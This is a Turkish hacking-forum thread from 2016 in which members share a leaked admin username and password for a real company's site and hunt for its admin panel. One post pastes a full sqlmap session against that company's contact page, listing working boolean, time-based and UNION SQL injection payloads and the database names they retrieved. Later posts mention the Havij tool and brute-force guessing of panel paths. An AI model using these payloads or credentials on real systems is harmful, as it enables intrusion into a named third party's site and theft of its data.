THT DUYURU

chat
Seçenekler

1 Adet "-Admin User - Admin Pass -"

WronQExecutive - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2015
Nereden:
UNDEFINED
Mesajlar:
1.395
Konular:
275
Teşekkür (Etti):
173
Teşekkür (Aldı):
281
Ticaret:
(0) %
22-05-2016 11:22
#1
1 Adet "-Admin User - Admin Pass -"
Paneli Bulan Alsın Beyler

AdminUser : admin

AdminPass : Admin@123


---------------------
█║▌│█│║▌║││█║▌║▌║

© Copyrigt 2015-2017
Heratix - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2016
Nereden:
TURAN
Mesajlar:
3.255
Konular:
414
Teşekkür (Etti):
641
Teşekkür (Aldı):
1057
Ticaret:
(0) %
22-05-2016 11:23
#2
Eline sağlık
paneli atsaydın iyi olurdu
HunterRED - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2016
Mesajlar:
202
Konular:
16
Teşekkür (Etti):
20
Teşekkür (Aldı):
34
Ticaret:
(0) %
22-05-2016 11:25
#3
Eline şağlık
--------------------- Asıl av avcıdır!
TC Mehmet Bey - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Nereden:
Nereye..
Yaş:
21
Mesajlar:
1.521
Konular:
181
Teşekkür (Etti):
132
Teşekkür (Aldı):
517
Ticaret:
(0) %
22-05-2016 11:25
#4
Eline sağlık.
---------------------
Dur! Beynimi çıkarayım da eşit şartlarda konuşalım
JoseaV - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2015
Nereden:
İstanbul
Mesajlar:
724
Konular:
35
Teşekkür (Etti):
102
Teşekkür (Aldı):
78
Ticaret:
(0) %
22-05-2016 11:29
#5
Bu siteyi sen bulduğuna eminmisin acaba bi yerde gördümde ve baya erken paylaşılmış orda
WronQExecutive - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2015
Nereden:
UNDEFINED
Mesajlar:
1.395
Konular:
275
Teşekkür (Etti):
173
Teşekkür (Aldı):
281
Ticaret:
(0) %
22-05-2016 11:56
#6
Alıntı:
JoseaV´isimli üyeden Alıntı Mesajı göster
Bu siteyi sen bulduğuna eminmisin acaba bi yerde gördümde ve baya erken paylaşılmış orda
URL 3:
GET Contact Us_MING HONG TECHNOLOGY (SHENZ ZHEN) LIMITED
do you want to test this URL? [Y/n/q]
> y
[11:09:49] [INFO] testing URL 'http://www.minghongtec.com/en/contact.php?ID=1'
[11:09:51] [INFO] testing connection to the target URL
[11:09:52] [INFO] checking if the target is protected by some kind of WAF/IPS/ID
S
[11:09:52] [INFO] testing if the target URL is stable
[11:09:53] [INFO] target URL is stable
[11:09:53] [INFO] testing if GET parameter 'ID' is dynamic
[11:09:53] [INFO] confirming that GET parameter 'ID' is dynamic
[11:09:53] [INFO] GET parameter 'ID' is dynamic
[11:09:54] [INFO] heuristic (basic) test shows that GET parameter 'ID' might be
injectable (possible DBMS: 'MySQL')
[11:09:54] [INFO] testing for SQL injection on GET parameter 'ID'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
ecific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending
provided level (1) and risk (1) values? [Y/n] y
[11:10:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:10:06] [INFO] GET parameter 'ID' seems to be 'AND boolean-based blind - WHER
E or HAVING clause' injectable
[11:10:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[11:10:07] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause'
[11:10:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[11:10:08] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (EXTRACTVALUE)'
[11:10:08] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[11:10:09] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (UPDATEXML)'
[11:10:09] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXP)'
[11:10:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
XP)'
[11:10:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[11:10:11] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
IGINT UNSIGNED)'
[11:10:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[11:10:12] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
[11:10:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
[11:10:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[11:10:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:10:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[11:10:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[11:10:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:10:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[11:10:16] [INFO] testing 'MySQL inline queries'
[11:10:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[11:10:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[11:10:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[11:10:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:10:18] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment
)'
[11:10:19] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:10:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[11:10:30] [INFO] GET parameter 'ID' seems to be 'MySQL >= 5.0.12 AND time-based
blind (SELECT)' injectable
[11:10:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:10:30] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[11:10:31] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending t
he range for current UNION query injection technique test
[11:10:33] [INFO] target URL appears to have 7 columns in query
[11:10:41] [INFO] GET parameter 'ID' is 'Generic UNION query (NULL) - 1 to 20 co
lumns' injectable
[11:10:41] [WARNING] parameter length constrainting mechanism detected (e.g. Suh
osin patch). Potential problems in enumeration phase can be expected
GET parameter 'ID' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] y
sqlmap identified the following injection point(s) with a total of 59 HTTP(s) re
quests:
---
Parameter: ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=1 AND 5938=5938

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ID=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FlCd)

Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: ID=-2508 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171767171,0x5676
4a65666c674e7a687259476f716941535762486a4768695078 657744796d647444756d425044,0x7
16a6a7671),NULL,NULL,NULL-- HAXZ
---
do you want to exploit this SQL injection? [Y/n] y
[11:11:25] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.12
[11:11:25] [INFO] fetching database names
[11:11:26] [INFO] the SQL query used returns 2 entries
[11:11:26] [INFO] retrieved: information_schema
[11:11:27] [INFO] retrieved: minghong123
available databases [2]:[*] information_schema[*] minghong123
---------------------
█║▌│█│║▌║││█║▌║▌║

© Copyrigt 2015-2017
AZAKLI - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
12/2015
Mesajlar:
558
Konular:
77
Teşekkür (Etti):
4
Teşekkür (Aldı):
30
Ticaret:
(0) %
22-05-2016 11:58
#7
Amin panelini bulan varmı ? havij lazım oda bozuk ya
MwTugi - ait Kullanıcı Resmi (Avatar)
İstihbaratçı
Üyelik tarihi:
05/2016
Nereden:
Nereye !
Yaş:
5
Mesajlar:
4.881
Konular:
376
Teşekkür (Etti):
334
Teşekkür (Aldı):
1618
Ticaret:
(0) %
22-05-2016 12:08
#8
410 tane denendi. Hiç birinde bulunamadı temel. Panel saklı yada sadece ftp bağlantılı mı nasıl anlamadım.
---------------------
Düşme!
Düşersen, bağımsızlığını ilan eder dostların,
Düşünce, bütün düşüncelerin değişir hayata dair.
Yılanın ne kadar masum, kurdun suçsuz, çakalın çakal olmadığını anlarsın iki yüzlü insanları görünce
,
Düşme!

10'uncu Köyden!
agola - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
07/2015
Mesajlar:
713
Konular:
42
Teşekkür (Etti):
6
Teşekkür (Aldı):
89
Ticaret:
(0) %
22-05-2016 12:30
#9
eline sağlık panel olsaydı çok iyi olurdu be

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler